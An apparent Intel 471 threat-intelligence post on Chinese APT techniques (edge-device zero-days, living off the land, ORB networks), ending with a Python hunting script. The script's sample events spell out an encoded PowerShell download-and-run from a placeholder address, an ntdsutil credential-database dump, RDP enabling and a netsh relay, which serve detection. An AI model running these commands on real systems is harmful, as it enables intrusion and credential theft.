A Look at Trending Chinese APT Techniques | Intel 471

A Look at Trending Chinese APT Techniques

Nov 18, 2024
Background

China’s global ambitions continue to grow, and its military strength, technology research and economic power give it an opportunity to challenge the global order — particularly the standing of the U.S. China is expected to soon have the military capability to take Taiwan by force: in April 2024, Adm. John Aquilino of the U.S. Indo-Pacific Command cautioned that China will be capable of invading Taiwan by 2027. Its construction of bases and airstrips on contested reefs in the Spratly Islands near the Philippines continues to raise military tensions. On the research side, China has invested an estimated US $15 billion in quantum computing — more than three times the investment of any other country — and is expected to invest as much as US $1.4 trillion in artificial intelligence (AI) over the next six years. Throughout the world, China also uses its economic might, via loans and trade initiatives, to increase its influence in places such as Africa and the Pacific Island nations.

Fig. 1: A map of the contested Spratly Islands, a clutch of reefs, shoals and islands in the South China Sea claimed by Brunei, China, Malaysia, the Philippines, Taiwan and Vietnam.

Cyber capabilities play a key role in achieving China’s strategic goals, including keeping partners aligned with China and shaping public narratives. This has raised alarms among other governments, which have called for increased vigilance and tightened security. China’s offensive cyber capabilities have been used for espionage, intellectual property theft and the prepositioning of footholds within the critical infrastructure of its adversaries. U.S. intelligence assesses that these stealthy footholds are intended to enable disruptive or destructive attacks in the event of a conflict, and the campaigns behind them have targeted government and civilian infrastructure at scale. U.S. FBI Director Christopher Wray said China “has a bigger hacking program than every other major nation combined. In fact, if each one of the FBI’s cyber agents and intelligence analysts focused exclusively on the China threat, China’s hackers would still outnumber FBI cyber personnel by at least 50 to 1.”

Espionage traditionally has been shrouded in secrecy, but this is changing. In the past 18 months, governments have publicly disclosed suspected Chinese state-sponsored cyber activity to build security awareness, and that transparency drive has in turn changed the advanced persistent threat (APT) landscape. Chinese state-sponsored threat actors have responded to global geopolitical developments in 2024 by updating their tactics, techniques and procedures (TTPs) and tool sets to avoid having their campaigns linked to Beijing. Threat actors with a China nexus now emphasize stealth more than ever, weaponizing network edge devices, using living-off-the-land (LOTL) techniques and setting up operational relay box (ORB) networks.

This post is derived from Intel 471’s Cyber Geopolitical Intelligence, a service that offers insights and analysis of political activity and significant regional events, including in China, Iran and Russia, and of how those events affect the cyber threat landscape. This post discusses some of the state-sponsored campaigns linked to China and which techniques will likely continue to trend. For more information, please contact Intel 471.

Zero-Day Exploits

Chinese APT groups will continue to shift away from traditional initial access methods such as social engineering toward the exploitation of zero-day vulnerabilities in network edge devices at scale. Edge devices and services such as firewalls and virtual private network (VPN) gateways have become increasingly popular targets. These devices are internet facing and provide critical services to remote users, but they are difficult for network administrators to monitor because they typically cannot run endpoint detection and response (EDR) agents. Compromising one provides a “rapid route to privileged local or network credentials on a server with broad access to the internal network” of a target organization, according to research from WithSecure.

Edge-related common vulnerabilities and exposures (CVEs) added to the Known Exploited Vulnerabilities (KEV) catalog of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) increased from an average of two per month in 2022 to 4.75 per month in 2024. Conversely, non-edge entries dropped from 5.36 per month in 2023 to three per month in 2024. Additionally, an estimated 85% of the known zero-days exploited by Chinese nation-state groups since 2021 were in public-facing appliances, which is consistent with a growing trend of attackers singling out edge devices for mass exploitation.

The Chinese threat group Volt Typhoon (aka Vanguard Panda, Bronze Silhouette, Dev-0391, UNC3236, Voltzite and Insidious Taurus), first identified in mid-2021, often relies on exploiting zero-day vulnerabilities. The group targets critical infrastructure, such as communications, energy, transport and utilities, including water and wastewater facilities. The group’s “choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence-gathering activities,” according to a U.S. advisory. Volt Typhoon targets public-facing appliances — routers, VPNs and firewalls — in campaigns the U.S. assesses with high confidence are intended to preposition the group on those devices so that it can disrupt them if needed. In January 2024, the U.S. government announced it had disrupted a botnet that Volt Typhoon had assembled and used in attacks on critical infrastructure. The botnet was built with the KV malware, which infected hundreds of small office/home office (SOHO) routers, most of which were end of life and no longer receiving security updates.

Several of the largest cyberattacks in 2023 involved vulnerabilities in edge devices or enterprise appliances. On May 23, 2023, Barracuda disclosed CVE-2023-2868, a zero-day remote command injection vulnerability in its Email Security Gateway (ESG) appliance. As early as Oct. 10, 2022, a threat actor group had been sending emails to potential victims with malicious attachments crafted to exploit the ESG when it scanned them. Mandiant identified the group as UNC4841, a cyber espionage group that acts in support of China.

In early 2021, a group known as Silk Typhoon (under Microsoft’s current threat actor naming scheme) exploited a series of zero-day vulnerabilities, including CVE-2021-26855, a server-side request forgery flaw in the on-premises version of Microsoft’s Exchange email server. The attack could be launched remotely and without authentication against any Exchange server exposed on port 443. Tens of thousands of Exchange servers were exploited using the vulnerabilities — collectively known as the ProxyLogon flaws — in the days around Microsoft’s release of out-of-band patches.

How does China source these zero-day vulnerabilities? Increasingly, domestically. Chinese security researchers are talented and prolific, and Chinese teams in the 2010s saw success at international Capture the Flag and hacking competitions such as DEF CON and Pwn2Own. But in 2017, Beijing started to pressure private sector security researchers to stop them from sharing knowledge at overseas cybersecurity events. Prominent Chinese information security figures also asserted that knowledge of undisclosed software vulnerabilities “should remain in China.” In the ensuing years, the Chinese Communist Party (CCP) incorporated the use of security flaws into its national military-civil fusion strategy, which aims to acquire foreign intellectual property, key research and high-value information.

China now uses bug-bounty programs, hacking competitions, universities and private entities to collect information on zero-day vulnerabilities in popular software and products. By mandating that security researchers disclose vulnerabilities to state authorities first (the 2021 Regulations on the Management of Network Product Security Vulnerabilities require reporting to the Ministry of Industry and Information Technology within two days), Beijing provides an operational window for nation-state cyber operators to exploit those vulnerabilities for cyber espionage and intelligence gathering before vendors can patch. One example of this arrangement played out in 2021. Microsoft patched an Exchange vulnerability tracked as CVE-2021-42321 that had been exploited in the wild three days after the flaw was demonstrated at the Tianfu Cup, an annual hacking competition held in Chengdu, Sichuan.

Living Off the Land

Rather than develop highly sophisticated custom malware, nation-state groups increasingly will use LOTL techniques to maintain persistent, undetected access to information technology (IT) networks. LOTL techniques use the legitimate tools, features and functions already present in a target environment to traverse networks and blend into normal activity, reducing the likelihood that the attacker’s presence is flagged as suspicious. In 2023, the Chinese APT groups Flax Typhoon (aka RedJuliett and Ethereal Panda) and Volt Typhoon leveraged utilities built into the Windows operating system to target key sectors in the U.S., Taiwan and elsewhere. Among the tools they used were wmic, ntdsutil, netsh and PowerShell.

In August 2023, the China-linked cyber espionage group BlackTech used minimal-tooling techniques such as NetCat shells and modifying the victim’s registry to enable the remote desktop protocol (RDP). In July 2024, the Chinese-speaking APT group Ghost Emperor resurfaced after an extended period of inactivity with new obfuscation techniques, including the use of living-off-the-land binaries (LOLBins) such as reg.exe and expand.exe within the batch file that initiated the infection chain on the compromised machine.

Compromised Infrastructure

Chinese ORB networks will continue to develop and mature at pace, reducing APT groups’ dependency on conventional actor-controlled infrastructure. ORB networks are global infrastructures of virtual private servers (VPSs) and compromised smart devices and routers. These extensive networks of proxy devices allow their administrators to scale up and create a “constantly evolving mesh network” that conceals espionage operations, because victim-facing traffic arrives from a rotating pool of unremarkable, often residential, addresses rather than from static actor-owned infrastructure that can be blocklisted. While ORB networks have existed for years, Chinese ORBs in particular have grown in popularity and sophistication recently. Each Chinese ORB is administered by either a private company or a state-sponsored entity and serves multiple threat clusters at any given time.

The Mulberry Typhoon group (aka APT5, Bronze Fleetwood, Keyhole Panda, Manganese, Poisoned Flight, TABCTENG and TEMP.Bottle) and the Nylon Typhoon group (aka ke3chang, APT15, Vixen Panda and Nickel) used the SPACEHOP network to conduct network reconnaissance scanning and to exploit vulnerabilities. The Violet Typhoon group (aka APT31) and several other actors with a China nexus used the FLORAHOX ORB network, which proxies traffic from a source and relays it through the Tor network and numerous compromised router nodes to obfuscate the origin of cyber espionage attacks.

Assessment

Global geopolitical developments will continue to heavily influence the Chinese APT threat landscape in terms of targeting, tool sets and TTPs. Accelerating improvements in the cybersecurity posture of numerous key targeted countries have compelled Chinese state-sponsored actors to become more innovative in their attack strategies.

The use of ORB networks and the exploitation of network edge devices emphasize the scalability of these attacks, and all three techniques prioritize secrecy. Adopting them would have required an accumulation of upgraded skills, malware and tools that could only be achieved through continuous reconnaissance of target networks and technologies, as well as meticulous testing of tools against them over extended periods. Therefore, these changes highly likely reflect a considered, fundamental and lasting shift in Chinese nation-state cyber operations.

In the next six to 12 months, governments and industry regulators worldwide will increase oversight of vital sectors such as energy, public administration, military and defense, technology, manufacturing, telecommunications and media, health care and financial services. Not only will Chinese nation-state threat actors almost certainly continue to pursue these high-value targets, it is also probable they will scale up their operations to conduct global campaigns and target as many entities in each region or sector as possible, maximizing the gain from each exploitation.

Hunt Packages

Intel 471 provides threat hunting capabilities for Chinese APT activity through our threat hunting platform HUNTER471. The following is a non-exhaustive list of hunt packages we have created related to the tactics used by Chinese nation-state threat actors.

These pre-written threat hunt queries can be used to query logs stored in security information and event management (SIEM) or EDR systems to detect potential malicious activity. The queries are compatible with a variety of security tools and products, such as CarbonBlack Cloud - Investigate, CarbonBlack Response, CrowdStrike, CrowdStrike LogScale, Elastic, Microsoft Defender, Microsoft Sentinel, Palo Alto Cortex XDR, QRadar Query, SentinelOne, Splunk and Trend Micro Vision One. Register for the Community Edition of HUNTER471, which contains sample hunt packages at no cost.

Fig. 2: A screenshot of hunt packages available in HUNTER471 related to finding behaviors associated with the threat actor group Volt Typhoon.

WMIC Windows Internal Discovery and Enumeration

This package identifies potentially malicious use of the Windows Management Instrumentation command-line utility (wmic.exe) for local enumeration and discovery of a host, such as listing processes, user accounts, services or installed patches.

Obfuscated PowerShell Execution String - Potential Malware Execution

Many adversaries obfuscate PowerShell commands, most commonly by passing a Base64-encoded (UTF-16LE) script through the -EncodedCommand parameter or one of its abbreviations, often alongside flags such as -NoProfile and -WindowStyle Hidden. This package identifies characteristics common to many actors using this technique.

Enabling Remote Desktop Protocol (RDP) - Possible SmokedHam Activity (Commandline Arguments)

This content is designed to detect command-line arguments that modify the registry value controlling whether RDP is enabled (fDenyTSConnections under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server or HKLM\SYSTEM\ControlSet00*\Control\Terminal Server; setting it to 0 enables RDP). False positives may occur depending on the environment, as administrators legitimately modify these keys.

Dump Active Directory Database with NTDSUtil - Potential Credential Dumping

This content is designed to identify when ntdsutil.exe is used to create a full Install From Media (IFM) copy of the Active Directory database (ntds.dit), which attackers copy off the domain controller to extract credential hashes offline.

Netsh Port Forwarding Command

This use case is meant to identify the netsh port forwarding command-line parameters "interface portproxy add" (for example, "netsh interface portproxy add v4tov4 ..."), which turn a compromised host into a traffic relay between network segments.

Restricted Admin Mode Login - Possible Lateral Movement

This hunt package is meant to capture the surrounding activity when a user successfully logs in (Event ID 4624, logon type 10) via RDP with Restricted Admin mode enabled. Because Restricted Admin mode does not send the user's credentials to the remote host, it allows an attacker holding only an NTLM hash to open an RDP session (pass the hash over RDP).
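To make the LOTL tradecraft described in the Living Off the Land section and the hunt packages above concrete, the following is an added example written for this page; it is not Intel 471 or HUNTER471 code and does not reproduce their queries. It implements the six hunt ideas as plain rules over process-creation (Windows 4688 / Sysmon event 1) and logon (4624) events, including decoding the UTF-16LE Base64 payload behind -EncodedCommand so that the decoded script, not just the flag, can be inspected. The events, the encoded payload and the 198.51.100.7 address are constructed for illustration; the rule names and the dictionary field names are assumptions of this example, not a vendor schema.

```python
"""Added example (not Intel 471 or HUNTER471 code): LOTL hunt rules for
wmic, encoded PowerShell, RDP registry changes, ntdsutil IFM dumps,
netsh portproxy relays and Restricted Admin RDP logons, run over
constructed Windows events."""
import base64
import re
from typing import List, Optional, Tuple

# Constructed encoded PowerShell payload (UTF-16LE, then Base64), as passed
# to -EncodedCommand. 198.51.100.7 is a documentation address, not a real C2.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed sample telemetry (not real logs). Field names follow the
# Windows 4688 / Sysmon 1 (CommandLine) and 4624 (LogonType, Restricted
# Admin Mode) events, simplified into dictionaries.
SAMPLE_EVENTS = [
    {"EventID": 4688, "CommandLine": r'wmic process list brief'},
    {"EventID": 4688, "CommandLine": r'wmic /node:"FILESRV01" useraccount get name,sid'},
    {"EventID": 4688, "CommandLine": "powershell.exe -nop -w hidden -enc " + ENC},
    {"EventID": 4688, "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"EventID": 4688, "CommandLine": r'ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\tmp" q q'},
    {"EventID": 4688, "CommandLine": r'netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=443 connectaddress=10.0.0.12'},
    {"EventID": 4624, "LogonType": 10, "RestrictedAdminMode": "Yes", "TargetUserName": "svc_backup"},
    # Benign noise that the rules must not flag.
    {"EventID": 4688, "CommandLine": r'powershell.exe -File C:\scripts\backup.ps1'},
    {"EventID": 4688, "CommandLine": r'netsh advfirewall show allprofiles'},
    {"EventID": 4624, "LogonType": 10, "RestrictedAdminMode": "No", "TargetUserName": "jdoe"},
]

# wmic used for host/domain enumeration (process, account, patch, service ...).
WMIC_DISCOVERY = re.compile(
    r"\bwmic(?:\.exe)?\b.*\b(?:process|useraccount|group|qfe|service|share|"
    r"nicconfig|computersystem|ntdomain|product)\b", re.I)
# PowerShell with -e/-ec/-en/-enc/-encodedcommand followed by a Base64 blob.
ENCODED_PS = re.compile(
    r"\bpowershell(?:\.exe)?\b.*?\s-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
                 "net.webclient", "invoke-webrequest", "reflection.assembly")
# fDenyTSConnections set to 0 under any control set (reg.exe or Set-ItemProperty).
RDP_ENABLE = re.compile(
    r"(?:CurrentControlSet|ControlSet00\d)\\Control\\Terminal Server.*fDenyTSConnections.*(?:/d|-Value)\s+0\b", re.I)
# ntdsutil IFM export of ntds.dit (full copy of the AD database).
NTDSUTIL_IFM = re.compile(
    r"\bntdsutil(?:\.exe)?\b.*\b(?:ifm|create\s+full|ac\s+i\s+ntds|activate\s+instance\s+ntds)\b", re.I)
# netsh portproxy relay creation.
NETSH_PORTPROXY = re.compile(r"\bnetsh(?:\.exe)?\b.*\bint(?:erface)?\s+portproxy\s+add\b", re.I)

Finding = Tuple[int, str, str]  # (event index, rule name, detail)


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE); None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events: List[dict]) -> List[Finding]:
    """Apply every rule to every event and return all findings."""
    findings: List[Finding] = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 4624:
            # Restricted Admin RDP logon: type 10 with the Restricted Admin field set.
            if ev.get("LogonType") == 10 and str(ev.get("RestrictedAdminMode", "")).lower() == "yes":
                findings.append((i, "restricted_admin_rdp_logon", str(ev.get("TargetUserName", ""))))
            continue
        cmd = ev.get("CommandLine", "")
        if WMIC_DISCOVERY.search(cmd):
            findings.append((i, "wmic_discovery", cmd))
        m = ENCODED_PS.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group(1))
            # Only flag when the decoded script contains download/eval primitives.
            if decoded and any(k in decoded.lower() for k in SUSPICIOUS_PS):
                findings.append((i, "encoded_powershell", decoded))
        if RDP_ENABLE.search(cmd):
            findings.append((i, "rdp_enable_registry", cmd))
        if NTDSUTIL_IFM.search(cmd):
            findings.append((i, "ntdsutil_ifm", cmd))
        if NETSH_PORTPROXY.search(cmd):
            findings.append((i, "netsh_portproxy", cmd))
    return findings


if __name__ == "__main__":
    for idx, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] event {idx}: {detail[:80]}")
```

Run against the constructed events, the script flags the seven malicious records and none of the benign ones. The decoding step is the part worth keeping when porting these rules to a SIEM query: matching on the -enc flag alone produces noise from signed management scripts, whereas matching on the decoded script for IEX, DownloadString or FromBase64String is what separates the tradecraft from routine automation. As the RDP package notes, the registry and netsh rules will also fire on legitimate administration, so they are hunt leads to be triaged against change records rather than stand-alone alerts.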